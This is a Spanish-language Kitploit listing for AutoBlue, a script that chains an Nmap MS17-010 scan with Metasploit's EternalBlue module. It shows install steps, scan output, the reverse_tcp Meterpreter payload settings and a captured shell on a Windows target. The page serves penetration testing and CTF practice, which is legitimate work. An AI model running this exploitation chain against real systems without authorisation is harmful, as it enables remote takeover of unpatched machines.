Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
autoblue — AutoBlue - Herramienta automatizada de explotación de EternalBlue (CVE-2017-0144 / MS17-010) que utiliza Nmap y Metasploit para hacking ético, pruebas de penetración y desafíos CTF. ¡Estrictamente solo para uso autorizado y educativo! | Kitploit
Herramientas/GitHubGitHub/atithkhawas/autoblue
Escáneres de VulnerabilidadesGeneración de PayloadsExplotaciónPost-ExplotaciónCTFPruebas de PenetraciónAprendizaje y EducaciónRed Teaming
GitHubatithkhawas/autoblue

autoblue

AutoBlue - Herramienta automatizada de explotación de EternalBlue (CVE-2017-0144 / MS17-010) que utiliza Nmap y Metasploit para hacking ético, pruebas de penetración y desafíos CTF. ¡Estrictamente solo para uso autorizado y educativo!

Ver Repositorio
41hace 1 añoAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

AUTOBLUE: Herramienta Automatizada de Explotación EternalBlue

AUTOBLUE es una herramienta de automatización diseñada para explotar la vulnerabilidad EternalBlue (CVE-2017-0144) en máquinas Windows. La herramienta integra el poder de Nmap para el escaneo de vulnerabilidades y msfconsole de Metasploit para la explotación, permitiendo a los usuarios identificar automáticamente sistemas vulnerables y lanzar el exploit EternalBlue para obtener acceso remoto al objetivo.

Esta herramienta está diseñada principalmente para profesionales de la seguridad, probadores de penetración y hackers éticos que trabajan en entornos controlados y autorizados, como desafíos Capture The Flag (CTF), compromisos de pruebas de penetración o configuraciones de laboratorio. AUTOBLUE permite a los usuarios explotar la vulnerabilidad EternalBlue con una intervención manual mínima, simplemente ingresando la dirección IP del objetivo.

Características

  • Escaneo Automatizado de Vulnerabilidades: Utiliza Nmap para escanear la vulnerabilidad EternalBlue (CVE-2017-0144) en la máquina objetivo.

  • Explotación Sin Problemas: Aprovecha msfconsole de Metasploit para lanzar el exploit EternalBlue automáticamente.

  • Configuración Sencilla: Solo requiere una dirección IP objetivo y un entorno de trabajo con Nmap y Metasploit instalados.

  • Informe de Salida: Genera una salida que indica el éxito o fracaso del intento de explotación.

Tabla de Contenidos

  • Requisitos Previos

  • Instalación

  • Uso

  • Cómo Funciona

  • Consideraciones de Seguridad

  • Contribuciones

  • Licencia

  • Agradecimientos

  • Descargo de Responsabilidad

Requisitos Previos:

Antes de usar AUTOBLUE, asegúrese de que las siguientes herramientas estén instaladas en su máquina:

Nmap: Una herramienta de escaneo de red para detectar máquinas vulnerables.

Metasploit Framework: Una plataforma de pruebas de penetración que incluye exploits para EternalBlue.

Instalar Nmap:

  • En Linux (basado en Debian):

Copiar código

root@kitploit:~
      sudo apt update

y

root@kitploit:~
      sudo apt install nmap

En Windows o macOS, descargue Nmap desde el sitio web oficial.

Instalar Metasploit:

En Linux (basado en Debian):

Copiar código

root@kitploit:~
      sudo apt update

y

root@kitploit:~
     sudo apt install metasploit-framework
     

En Windows o macOS, descargue Metasploit desde el sitio web oficial.

Instalación:

Para instalar AUTOBLUE, siga estos pasos:

  • Clonar el repositorio:

    root@kitploit:~
      git clone https://github.com/AtithKhawas/autoblue.git
    

    y

    root@kitploit:~
         cd autoblue
    

Asegúrese de que Nmap y Metasploit estén correctamente instalados como requisitos previos.

  • Hacer ejecutable el script:

    root@kitploit:~
    chmod +x autoblue.sh
    

Uso:

AUTOBLUE está diseñado para automatizar el escaneo y la explotación de la vulnerabilidad EternalBlue. Aquí se explica cómo usarlo:

  • Ejecutar la Herramienta

Para usar AUTOBLUE, ejecute el siguiente comando en su terminal:

Copiar código

root@kitploit:~
     ./autoblue.sh 

Salida:

root@kitploit:~
     ┌──(root㉿kali)-[/home/Elliot] 
     └─# ./autoblue.sh 
     ============================================
     ********************************************
     AutoBlue    - EternalBlue Exploit Automation
     ********************************************
     ********************************************
     ------------------------Made by ATITH KHAWAS
     ============================================
     Enter Target IP Address:

Solicitará la dirección IP del objetivo y la suya.

Ejemplo

root@kitploit:~
      Enter Target IP Address: Target<IP Address>
      Enter Your IP Address: Your <IP Address>

Una vez que ejecute la herramienta, comenzará a escanear con Nmap:

Salida-1

root@kitploit:~
 Target IP Address: ***.***.**.**
 [+] Scanning Target for MS17-010 Vulnerability...
 Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-30 12:41 EST
 Nmap scan report for ***.***.**.**
 Host is up (0.19s latency).

 PORT    STATE SERVICE
 445/tcp open  microsoft-ds

 Host script results:
 | smb-vuln-ms17-010: 
 |   VULNERABLE:
 |   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
 |     State: VULNERABLE
 |     IDs:  CVE:CVE-2017-0143
 |     Risk factor: HIGH
 |       A critical remote code execution vulnerability exists in Microsoft SMBv1
 |        servers (ms17-010).
 |           
 |     Disclosure date: 2017-03-14
 |     References:
 |       https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/
 |       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
 |_      https://technet.microsoft.com/en-us/library/security/ms17-010.aspx

 Nmap done: 1 IP address (1 host up) scanned in 2.40 seconds
 [+] Target is VULNERABLE to EternalBlue!

Aquí es donde comienza el verdadero trabajo, reduciendo significativamente el proceso que consume tiempo. Si el objetivo es vulnerable, lanza automáticamente Msfconsole y configura RHOSTS, PAYLOAD, LHOST y LPORT con el puerto predeterminado 4444.

Salida-2

root@kitploit:~
      [+] Launching Metasploit...
      [*] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp
      RHOSTS => ***.***.**.**
      PAYLOAD => windows/x64/meterpreter/reverse_tcp
      LHOST => ***.***.**.**
      LPORT => 4444
      [*] Started reverse TCP handler on ***.***.**.**:4444 

Y nos proporciona la shell Meterpreter del objetivo.

Salida-3

root@kitploit:~
       [+] ***.***.**.**:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
       [+] ***.***.**.**:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
       [+] ***.***.**.**:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

       meterpreter > pwd
       C:\Windows\system32

Cómo Funciona:

  • Escaneo de Scripts de Nmap: La herramienta primero usa Nmap Script Scan (--script smb-vuln-ms17-010) para detectar si la máquina objetivo es vulnerable al exploit EternalBlue. Verifica si el puerto 445 está abierto e intenta identificar vulnerabilidades SMB.

  • Exploit de Metasploit: Si la máquina objetivo se encuentra vulnerable, AUTOBLUE procede a lanzar el exploit EternalBlue usando msfconsole de Metasploit. El script configurará y enviará el payload necesario para explotar la vulnerabilidad.

  • Shell Reversa: Si el exploit tiene éxito, se abrirá una shell reversa para proporcionar una interfaz de línea de comandos en la máquina víctima.

  • Retroalimentación: La herramienta proporciona retroalimentación durante todo el proceso, incluyendo si el objetivo fue explotado con éxito, y muestra cualquier información relevante (por ejemplo, dirección IP de la shell reversa).

Consideraciones de Seguridad:

  • Uso Legal: Esta herramienta solo debe usarse en entornos autorizados. Asegúrese de tener permiso explícito para probar la máquina objetivo y de que no sea ilegal hacerlo en su jurisdicción.

  • Entrada del Usuario: Asegúrese de que solo se ingresen IPs de confianza en la herramienta para evitar mal uso. Ejecutar esta herramienta en sistemas no confiables podría provocar incidentes de seguridad.

  • Seguridad del Payload: El payload de shell reversa utilizado en esta herramienta es inherentemente riesgoso. No exponga la máquina de ataque ni sus listeners a redes no confiables.

  • Mantenga las Dependencias Actualizadas: Asegúrese de actualizar regularmente Nmap y Metasploit para mitigar vulnerabilidades de seguridad conocidas en esas herramientas.

Contribuciones:

Las contribuciones al proyecto AUTOBLUE son bienvenidas. Si tiene alguna sugerencia, mejora o corrección de errores, no dude en bifurcar el repositorio y crear un pull request.

Licencia:

Esta herramienta es de código abierto y se distribuye bajo la Licencia MIT. Eres libre de usar, modificar y distribuir el software en tus propios proyectos. Sin embargo, debes incluir este aviso en todas las copias o partes sustanciales del software.

Agradecimientos:

  • Nmap: Por proporcionar la funcionalidad esencial de escaneo de vulnerabilidades.

  • Metasploit: Por suministrar el framework para explotar la vulnerabilidad EternalBlue.

  • Investigadores de Seguridad: Por descubrir y divulgar públicamente la vulnerabilidad EternalBlue, lo que ha ayudado a asegurar sistemas en todo el mundo.

Descargo de Responsabilidad:

AUTOBLUE es una herramienta destinada únicamente para uso educativo y ético. Los autores no son responsables de ninguna acción ilegal realizada con esta herramienta. Es su responsabilidad asegurarse de tener permiso explícito para realizar pruebas de penetración en cualquier sistema.

Use esta herramienta bajo su propio riesgo. Realice siempre actividades de pruebas de penetración en un entorno seguro y legal.

Descargar herramienta